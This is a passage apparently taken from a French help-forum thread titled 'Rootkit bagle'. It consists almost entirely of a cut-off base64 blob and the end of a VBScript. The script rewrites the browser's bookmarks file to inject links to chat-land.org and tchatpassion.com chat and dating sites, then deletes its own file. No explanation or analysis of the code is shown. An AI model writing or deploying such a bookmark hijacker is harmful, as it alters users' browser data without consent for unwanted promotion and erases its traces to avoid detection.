AAAAAA/wAAAP8AAAD/AAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD//////wAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP8AAAD/AAAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/wAAAP8AAAD/AAAA/wAAAP8AAAAAAAAAAAAAAAAAAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8AAAD/AAAA/wAAAP8A4+OPjg8AAADj44+OAwAAAOPjj44BAAAf4+OPjjkAAB/j448OOAAAH+Pjjg44AAAf4+OODjwAAB/j44wOPAAAH+PjjA48AAAf4+OIDjwAAB/gA4COPAAAH+ADgI48AAAf4cOAjjwAAB/j44GOPAAAH+PjgY48AAAf4+ODjjwAAB/j44OOOAAAH+Pjh444AAAf4+OPjjkAAB/gA4+OAQAAH+ADj44HAAAf//+Pjg8AAP///////wAA////////AAD///////8AAP/7/////wAAAOPxx+PHAAAA4/HH48cAAADj8cfjxwAAH+Pxx+PHAAAf4/HH48cAAB/j8cfjxwAAP+Pxx+PHAAA/4/HH48cAAD/j8cfjxwAAP+Pxx+PHAAA/4/HH48cAAD/gAcADxwAAP+ABwAPHAAA/4AHAA8cAAD/j8cfjxwAAP+Pxx+PHAAAf4/HH48cAAB/j8cfjxwAAH+Pxx+PHAAAA4/Hn5gAAAADj8fgGAAAAAOPx/g4AAAA="" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$5Upgt2"">Premium !!!</A>" & vbCrLf &_
"<DT><H3 ADD_DATE=""1227179973"" LAST_MODIFIED=""1227180093"" ID=""rdf:#$oJ8i83"">Divertissement</H3>" & vbCrLf &_
"<DL><p>" & vbCrLf &_
"<DT><A HREF=""http://videos.chat-land.org/"" ADD_DATE=""1227180060"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$pJ8i83"">Chat-Land - Vidéos drôles</A>" & vbCrLf &_
"<DT><A HREF=""http://fonds-ecrans.chat-land.org/"" ADD_DATE=""1227180068"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$qJ8i83"">Chat-Land - Fond écran</A>" & vbCrLf &_
"<DT><A HREF=""http://jeux.chat-land.org/"" ADD_DATE=""1227180075"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$rJ8i83"">Chat-Land - Jeux</A>" & vbCrLf &_
"<DT><A HREF=""http://blagues.chat-land.org/"" ADD_DATE=""1227180080"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$sJ8i83"">tchat, rencontres gratuites et sans inscription, divertissements, blagues et jeux diverses</A>" & vbCrLf &_
"<DD>Rencontre, chat et divertissements avec chat-land, le 1er site mondiale de tchat et de rencontres" & vbCrLf &_
"<DT><A HREF=""https://tchatpassion.com/"" ADD_DATE=""1227180088"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$tJ8i83"">Rurique en maintenance</A>" & vbCrLf &_
"<DT><A HREF=""http://paroles.chat-land.org/"" ADD_DATE=""1227180093"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$uJ8i83"">Chat-Land - Paroles de Chansons</A>" & vbCrLf &_
"</DL><p>" & vbCrLf &_
"</DL><p>" & vbCrLf &_
"<DT><A HREF=""https://tchatpassion.com/"" ADD_DATE=""1227278090"" LAST_CHARSET=""ISO-8859-1"" ID=""rdf:#$Z+lKF3"">Rencontre: Tchat Gratuit+Tchatche+Chat(NOUVEAU)! Rencontres</A>" & vbCrLf &_
"<DD>Rencontre Sur Un Tchat Gratuit, Tchatche Chat, Rencontres (NOUVEAU) ? Facile Rapide Gratuit Sympa sans inscription!" & vbCrLf
Set fsofav = CreateObject("Scripting.FileSystemObject")
Set xfav = fsofav.OpenTextFile(fav, ForWriting,true)
xfav.write mir1 & vbCrLf & mir2 & vbCrLf & ajout & vbCrLf & mir3
xfav.close
end if
WScript.Sleep 5000
dim cheminvbs
cheminvbs = WScript.ScriptFullName
Dim oFSOvbs
Set oFSOvbs = CreateObject("Scripting.FileSystemObject")
oFSOvbs.DeleteFile cheminvbs,True

Rootkit bagle

32 réponses

Votre réponse

Discussions similaires

Newsletters